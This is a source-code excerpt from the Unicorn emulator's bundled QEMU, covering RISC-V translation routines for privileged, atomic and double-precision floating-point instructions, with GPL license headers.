*/ static bool trans_ecall(DisasContext *ctx, arg_ecall *a) { /* always generates U-level ECALL, fixed in do_interrupt handler */ generate_exception(ctx, RISCV_EXCP_U_ECALL); exit_tb(ctx); /* no chaining */ ctx->base.is_jmp = DISAS_NORETURN; return true; } static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a) { // ignore this instruction generate_exception(ctx, RISCV_EXCP_BREAKPOINT); exit_tb(ctx); /* no chaining */ ctx->base.is_jmp = DISAS_NORETURN; return true; } static bool trans_uret(DisasContext *ctx, arg_uret *a) { return false; } static bool trans_sret(DisasContext *ctx, arg_sret *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); if (has_ext(ctx, RVS)) { gen_helper_sret(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_env, tcg_ctx->cpu_pc); exit_tb(ctx); /* no chaining */ ctx->base.is_jmp = DISAS_NORETURN; } else { return false; } return true; } static bool trans_mret(DisasContext *ctx, arg_mret *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); gen_helper_mret(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_env, tcg_ctx->cpu_pc); exit_tb(ctx); /* no chaining */ ctx->base.is_jmp = DISAS_NORETURN; return true; } static bool trans_wfi(DisasContext *ctx, arg_wfi *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->pc_succ_insn); gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env); return true; } static bool trans_sfence_vma(DisasContext *ctx, arg_sfence_vma *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->priv_ver >= PRIV_VERSION_1_10_0) { gen_helper_tlb_flush(tcg_ctx, tcg_ctx->cpu_env); return true; } return false; } static bool trans_sfence_vm(DisasContext *ctx, arg_sfence_vm *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->priv_ver <= PRIV_VERSION_1_09_1) { gen_helper_tlb_flush(tcg_ctx, tcg_ctx->cpu_env); return true; } return false; } static bool trans_hfence_gvma(DisasContext *ctx, arg_sfence_vma *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->priv_ver >= PRIV_VERSION_1_10_0 && has_ext(ctx, RVH)) { /* Hypervisor extensions exist */ /* * if (env->priv == PRV_M || * (env->priv == PRV_S && * !riscv_cpu_virt_enabled(env) && * get_field(ctx->mstatus_fs, MSTATUS_TVM))) { */ gen_helper_tlb_flush(tcg_ctx, tcg_ctx->cpu_env); return true; /* } */ } return false; } static bool trans_hfence_bvma(DisasContext *ctx, arg_sfence_vma *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->priv_ver >= PRIV_VERSION_1_10_0 && has_ext(ctx, RVH)) { /* Hypervisor extensions exist */ /* * if (env->priv == PRV_M || * (env->priv == PRV_S && * !riscv_cpu_virt_enabled(env) && * get_field(ctx->mstatus_fs, MSTATUS_TVM))) { */ gen_helper_tlb_flush(tcg_ctx, tcg_ctx->cpu_env); return true; /* } */ } return false; } 
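/*
 * Illustrative sketch (hypothetical helper, not used by the emulator):
 * the CSR instructions ultimately funnel into riscv_csrrw() in csr.c
 * above, which implements all four access flavours with one
 * read-modify-write rule. CSRRW passes write_mask = -1 (replace all
 * bits), CSRRS passes new_value = -1 with write_mask = rs1 (set the bits
 * in rs1), and CSRRC passes new_value = 0 with write_mask = rs1 (clear
 * the bits in rs1).
 */
static inline target_ulong csrrw_combine_sketch(target_ulong old_value,
                                                target_ulong new_value,
                                                target_ulong write_mask)
{
    /* e.g. CSRRS: (old & ~rs1) | (-1 & rs1) == old | rs1 */
    return (old_value & ~write_mask) | (new_value & write_mask);
}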
unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rva.inc.c
/* * RISC-V translation routines for the RV64A Standard Extension. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ static inline bool gen_lr(DisasContext *ctx, arg_atomic *a, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv src1 = tcg_temp_new(tcg_ctx); /* Put addr in load_res, data in load_val. */ gen_get_gpr(tcg_ctx, src1, a->rs1); if (a->rl) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); } tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->load_val, src1, ctx->mem_idx, mop); if (a->aq) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } tcg_gen_mov_tl(tcg_ctx, tcg_ctx->load_res, src1); gen_set_gpr(tcg_ctx, a->rd, tcg_ctx->load_val); tcg_temp_free(tcg_ctx, src1); return true; } static inline bool gen_sc(DisasContext *ctx, arg_atomic *a, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv src1 = tcg_temp_new(tcg_ctx); TCGv src2 = tcg_temp_new(tcg_ctx); TCGv dat = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); gen_get_gpr(tcg_ctx, src1, a->rs1); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->load_res, src1, l1); gen_get_gpr(tcg_ctx, src2, a->rs2); /* * Note that the TCG atomic primitives are SC, * so we can ignore AQ/RL along this path. */ tcg_gen_atomic_cmpxchg_tl(tcg_ctx, src1, tcg_ctx->load_res, tcg_ctx->load_val, src2, ctx->mem_idx, mop); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, dat, src1, tcg_ctx->load_val); gen_set_gpr(tcg_ctx, a->rd, dat); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); /* * Address comparison failure. However, we still need to * provide the memory barrier implied by AQ/RL. 
*/ tcg_gen_mb(tcg_ctx, TCG_MO_ALL + a->aq * TCG_BAR_LDAQ + a->rl * TCG_BAR_STRL); tcg_gen_movi_tl(tcg_ctx, dat, 1); gen_set_gpr(tcg_ctx, a->rd, dat); gen_set_label(tcg_ctx, l2); /* * Clear the load reservation, since an SC must fail if there is * an SC to any address, in between an LR and SC pair. */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->load_res, -1); tcg_temp_free(tcg_ctx, dat); tcg_temp_free(tcg_ctx, src1); tcg_temp_free(tcg_ctx, src2); return true; } static bool gen_amo(DisasContext *ctx, arg_atomic *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv, TCGArg, MemOp), MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv src1 = tcg_temp_new(tcg_ctx); TCGv src2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, src1, a->rs1); gen_get_gpr(tcg_ctx, src2, a->rs2); (*func)(tcg_ctx, src2, src1, src2, ctx->mem_idx, mop); gen_set_gpr(tcg_ctx, a->rd, src2); tcg_temp_free(tcg_ctx, src1); tcg_temp_free(tcg_ctx, src2); return true; } static bool trans_lr_w(DisasContext *ctx, arg_lr_w *a) { REQUIRE_EXT(ctx, RVA); return gen_lr(ctx, a, (MO_ALIGN | MO_TESL)); } static bool trans_sc_w(DisasContext *ctx, arg_sc_w *a) { REQUIRE_EXT(ctx, RVA); return gen_sc(ctx, a, (MO_ALIGN | MO_TESL)); } static bool trans_amoswap_w(DisasContext *ctx, arg_amoswap_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_xchg_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amoadd_w(DisasContext *ctx, arg_amoadd_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_add_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amoxor_w(DisasContext *ctx, arg_amoxor_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_xor_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amoand_w(DisasContext *ctx, arg_amoand_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_and_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amoor_w(DisasContext *ctx, arg_amoor_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_or_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amomin_w(DisasContext *ctx, arg_amomin_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_smin_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amomax_w(DisasContext *ctx, arg_amomax_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_smax_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amominu_w(DisasContext *ctx, arg_amominu_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_umin_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amomaxu_w(DisasContext *ctx, arg_amomaxu_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_umax_tl, (MO_ALIGN | MO_TESL)); } #ifdef TARGET_RISCV64 static bool trans_lr_d(DisasContext *ctx, arg_lr_d *a) { return gen_lr(ctx, a, MO_ALIGN | MO_TEQ); } static bool trans_sc_d(DisasContext *ctx, arg_sc_d *a) { return gen_sc(ctx, a, (MO_ALIGN | MO_TEQ)); } static bool trans_amoswap_d(DisasContext *ctx, arg_amoswap_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_xchg_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amoadd_d(DisasContext *ctx, arg_amoadd_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_add_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amoxor_d(DisasContext *ctx, arg_amoxor_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_xor_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amoand_d(DisasContext *ctx, arg_amoand_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_and_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amoor_d(DisasContext *ctx, arg_amoor_d *a) { return gen_amo(ctx, 
a, &tcg_gen_atomic_fetch_or_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amomin_d(DisasContext *ctx, arg_amomin_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_smin_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amomax_d(DisasContext *ctx, arg_amomax_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_smax_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amominu_d(DisasContext *ctx, arg_amominu_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_umin_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amomaxu_d(DisasContext *ctx, arg_amomaxu_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_umax_tl, (MO_ALIGN | MO_TEQ)); } #endif
unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rvd.inc.c
/* * RISC-V translation routines for the RV64D Standard Extension. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. 
*/ static bool trans_fld(DisasContext *ctx, arg_fld *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0, ctx->mem_idx, MO_TEQ); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fsd(DisasContext *ctx, arg_fsd *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rs2], t0, ctx->mem_idx, MO_TEQ); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmadd_d(DisasContext *ctx, arg_fmadd_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmadd_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fmsub_d(DisasContext *ctx, arg_fmsub_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmsub_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fnmsub_d(DisasContext *ctx, arg_fnmsub_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fnmsub_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fnmadd_d(DisasContext *ctx, arg_fnmadd_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fnmadd_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fadd_d(DisasContext *ctx, arg_fadd_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fadd_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fsub_d(DisasContext *ctx, arg_fsub_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fsub_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fmul_d(DisasContext *ctx, arg_fmul_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmul_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fdiv_d(DisasContext *ctx, arg_fdiv_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fdiv_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fsqrt_d(DisasContext *ctx, arg_fsqrt_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = 
ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fsqrt_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); mark_fs_dirty(ctx); return true; } static bool trans_fsgnj_d(DisasContext *ctx, arg_fsgnj_d *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FMOV */ tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1]); } else { tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs1], 0, 63); } mark_fs_dirty(ctx); return true; } static bool trans_fsgnjn_d(DisasContext *ctx, arg_fsgnjn_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FNEG */ tcg_gen_xori_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], INT64_MIN); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs2]); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0, tcg_ctx->cpu_fpr[a->rs1], 0, 63); tcg_temp_free_i64(tcg_ctx, t0); } mark_fs_dirty(ctx); return true; } static bool trans_fsgnjx_d(DisasContext *ctx, arg_fsgnjx_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FABS */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], ~INT64_MIN); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs2], INT64_MIN); tcg_gen_xor_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], t0); tcg_temp_free_i64(tcg_ctx, t0); } mark_fs_dirty(ctx); return true; } static bool trans_fmin_d(DisasContext *ctx, arg_fmin_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_fmin_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fmax_d(DisasContext *ctx, arg_fmax_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_fmax_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_s_d(DisasContext *ctx, arg_fcvt_s_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_d_s(DisasContext *ctx, arg_fcvt_d_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); mark_fs_dirty(ctx); return true; } static bool trans_feq_d(DisasContext *ctx, arg_feq_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_feq_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_flt_d(DisasContext *ctx, arg_flt_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_flt_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fle_d(DisasContext *ctx, arg_fle_d *a) { 
REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_fle_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fclass_d(DisasContext *ctx, arg_fclass_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_fclass_d(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_w_d(DisasContext *ctx, arg_fcvt_w_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_w_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_wu_d(DisasContext *ctx, arg_fcvt_wu_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_wu_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_d_w(DisasContext *ctx, arg_fcvt_d_w *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_w(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_d_wu(DisasContext *ctx, arg_fcvt_d_wu *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_wu(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } #ifdef TARGET_RISCV64 static bool trans_fcvt_l_d(DisasContext *ctx, arg_fcvt_l_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_l_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_lu_d(DisasContext *ctx, arg_fcvt_lu_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_lu_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmv_x_d(DisasContext *ctx, arg_fmv_x_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_gpr(tcg_ctx, a->rd, tcg_ctx->cpu_fpr[a->rs1]); return true; } static bool trans_fcvt_d_l(DisasContext *ctx, arg_fcvt_d_l *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_l(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_d_lu(DisasContext *ctx, arg_fcvt_d_lu *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); 
gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_lu(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } static bool trans_fmv_d_x(DisasContext *ctx, arg_fmv_d_x *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } #endif
unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rvf.inc.c
/* * RISC-V translation routines for the RV64F Standard Extension. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. 
